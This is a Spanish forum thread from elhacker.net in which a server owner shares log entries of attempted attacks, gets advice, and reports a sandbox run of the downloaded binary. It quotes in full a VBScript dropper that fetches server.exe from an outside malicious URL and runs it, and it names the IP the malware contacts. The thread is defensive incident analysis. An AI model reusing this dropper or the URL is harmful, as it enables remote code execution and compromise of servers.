elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Intentonas de colarme un malware en mi servidor web desde China
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Intentonas de colarme un malware en mi servidor web desde China  (Leído 176 veces)
warcry.


Desconectado Desconectado

Mensajes: 608


The Fallen Lords


Ver Perfil
Intentonas de colarme un malware en mi servidor web desde China
« en: 12 Enero 2018, 19:26 »

bueno he tenido dos intentonas de ejecucion de codigo en el log del servidor

Código:
6:12:08 117.61.135.182:19339 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}

esa de las 6:12 de la mañana y otra a las 7:17

en principio creo que no estoy infectado porque el antivirus cuando he hecho la descarga desde la web http://yamanbeisi.com/server.exe me lo detecta, por lo que no creo que se haya ejecutado.

también la segunda intentona supongo que seria porque la primera no ha cuajado.

desde el navegador no he conseguido repetir la secuencia de comandos, ya que lo mas que he conseguido me la muestra el log asi

Código:
9:14:34 192.168.0.10:50677 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell") > Post.Open "GET","http://yamanbeisi.com/server.exe",0 > Post.Send() > Set aGet = CreateObject("ADODB.Stream") > aGet.Mode = 3 > aGet.Type = 1 > aGet.Open() > aGet.Write(Post.responseBody) > aGet.SaveToFile "c:\server.exe",2 > wscript.sleep 1000

el log me lo muestra en una sola linea y en negro, mientras que las intentonas de china me las muestra en azul y con intros, con lo cual no se ahora mismo si mi servidor es vulnerable a que se pueda abrir una shell y ejecutar código.

en principio creo que no, pero estoy con la mosca.

cuando tenga un poco de tiempo intento una conexión desde una shell de linux

en definitiva, hasta que tenga tiempo de crear una sandbox y e intente ver que es lo que hace el "server.exe" que te descargas en la web china, a ver si hay un alma caritativa que analice el malware y si me pone exactamente que es lo que hace se lo agradecería, para ver si hay alguna conexión rara o proceso suplantado o lo que sea que haga y mirar que no se esta ejecutando en mi servidor

thanx


En línea

Evolucionamos porque pensamos y tanto la paciencia como la perseverancia son las fuentes de las que se nutre el conocimiento ya que el saber no ocupa lugar pero ocupa tiempo

- - -      Página Web de Warcry      - - -
engel lex
CoAdmin
***
Desconectado Desconectado

Mensajes: 13.184



Ver Perfil
Re: Intentonas de colarme un malware en mi servidor web desde China
« Respuesta #1 en: 12 Enero 2018, 20:25 »

Código:
Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}

no se como es el lio de los server en windows, pero parece querer explotar algo como fue shellshock en linux, una cadena mal parseada, o en hecho puede que intente explotar algún analizador de logs o similar esperando que ejecute al parsear

tampoco se como se protege, pero un fail2ban de linux tiras que no se use "wscript" en un acceso y permaban
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
warcry.


Desconectado Desconectado

Mensajes: 608


The Fallen Lords


Ver Perfil
Re: Intentonas de colarme un malware en mi servidor web desde China
« Respuesta #2 en: 12 Enero 2018, 21:02 »


no se como es el lio de los server en windows, pero parece querer explotar algo como fue shellshock en linux, una cadena mal parseada, o en hecho puede que intente explotar algún analizador de logs o similar esperando que ejecute al parsear

tampoco se como se protege, pero un fail2ban de linux tiras que no se use "wscript" en un acceso y permaban

en principio no tengo habilitada la opcion de ejecucion de scripts en el servidor, luego en teoria no deberia poder ejecutarse el "Wscript.Shell"

a parte he baneado todo el rango de ips del atacante 117.60.0.0 - 117.63.255.255

pero siempre te quedas con la mosca detrás de la oreja, por eso quería saber que hace exactamente el server.exe.

a ver si mañana por la mañana me pongo un rato y creo una sandbox.

esta noche si recibís desde mi ip ataques, recordad que igual soy un zombie, no soy yo  ;D
En línea

Evolucionamos porque pensamos y tanto la paciencia como la perseverancia son las fuentes de las que se nutre el conocimiento ya que el saber no ocupa lugar pero ocupa tiempo

- - -      Página Web de Warcry      - - -
warcry.


Desconectado Desconectado

Mensajes: 608


The Fallen Lords


Ver Perfil
Re: Intentonas de colarme un malware en mi servidor web desde China
« Respuesta #3 en: 13 Enero 2018, 13:14 »

Bueno, hoy he estado haciendo mis pruebas.

he creado una sandbox y he ejecutado el archivo malicioso "server.exe" desde la ubicación teórica de descarga
Código:
Shell.Run ("c:\server.exe")

teniendo en cuenta que no soy ningun experto en analisis de malware, mis impresiones generales son:

1. El archivo al ejecutarse permanece en el directorio, en este caso C: luego no se esconde.

2. El proceso se para facilmente desde el administrador de tareas luego no es pegajoso

3. Abre una conexion a la ip 202.124.205.33

Código:
server.exe 4244 TCP 192.168.226.132 49936 202.124.205.33 6380 SYN_SENT

4. Los datos de esa ip son:

Código:
Dirección IP: 202.124.205.33
AS Number (ASN): AS17553 Bogor Agricultural University
Organización: Bogor Agricultural University
Dominio:
DNS: 202.124.205.33
Pais: Indonesia
Código País: id
Bandera: Click para ver la bandera en grande
Nombre Región: Jawa Barat
País Original: Indonesia
Ciudad: Bekasi
Código ZIP: 17148
Diferencia Horaria: +07:00
Ips vinculadas: 202.124.205.33

El ataque provenía de una ip china, luego ese servidor de una universidad indonesia, podría ser un server comprometido y manejado por los chinos, para que directamente el troyano no les apunte a ellos.

En definitiva, a priori el ataque no ha tenido éxito, lo que no he conseguido reproducir es el log en mi servidor, lo que me tiene un poco mosca pero bueno. Creo que es un ataque que explota malas configuraciones de apache sobre windows server.

si algún experto se digna a analizar el bicho y aporta mas detalles se lo agradecería, parece un troyano en toda regla, pero como digo no soy conocedor del mundo del malware




En línea

Evolucionamos porque pensamos y tanto la paciencia como la perseverancia son las fuentes de las que se nutre el conocimiento ya que el saber no ocupa lugar pero ocupa tiempo

- - -      Página Web de Warcry      - - -
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
me han boicoteado el correo desde china
Dudas Generales
carliyos 4 1,149 Último mensaje 5 Abril 2010, 14:26
por carliyos
China produce y aloja una tercera parte del malware mundial
Noticias
wolfbcn 0 787 Último mensaje 21 Junio 2011, 15:22
por wolfbcn
POR FAVOR AYUDA DESDE CHINA « 1 2 3 »
Dudas Generales
HONEY77 23 6,295 Último mensaje 26 Enero 2012, 08:56
por BlackZeroX (Astaroth)
Acceder al servidor web via FTP desde un servidor virtual dedicado
Redes
Nucleorion 0 866 Último mensaje 21 Agosto 2013, 20:13
por Nucleorion
Ataques DDoS desde China
Seguridad
@Zaηυт Sєc 1 633 Último mensaje 8 Marzo 2015, 19:49
por engel lex
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines